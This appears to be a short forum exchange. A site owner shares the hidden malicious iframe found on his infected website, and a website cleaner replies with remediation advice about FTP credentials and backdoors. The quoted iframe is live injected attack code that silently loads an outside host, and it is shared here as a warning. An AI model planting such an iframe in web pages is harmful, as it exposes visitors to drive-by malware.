Hello guys, another one of the sites I manage has been infected and blocked by Google, here is the iFrame script that has the malicious virus in it just in case you guys have been attacked by the same person.
<iframe src=”http://namegamestore.cn:8080/index.php” width=183 height=129 style=”visibility: hidden”></iframe>
Thank You,
Gilberto Cortez
Gilberto,
Have you changed all FTP passwords yet? If not, please do as it appears that you may have a virus on the computer you use to FTP files to these different infected websites.
When doing a forensic analysis of infected websites the first thing to investigate is the common factor. In this case, unfortunately, it might be your PC.
The viruses that steal FTP login credentials are very good at hiding from anti-virus programs so you have nothing to fear. Just change all FTP passwords and clean the sites. Also, check all sites for various backdoors. These backdoors are what many hackers put on infected websites so they can re-infect them after they’ve been cleaned.
If you need any assistance with this, please contact me. I clean websites for a living and have cleaned over 20,000 of them to date.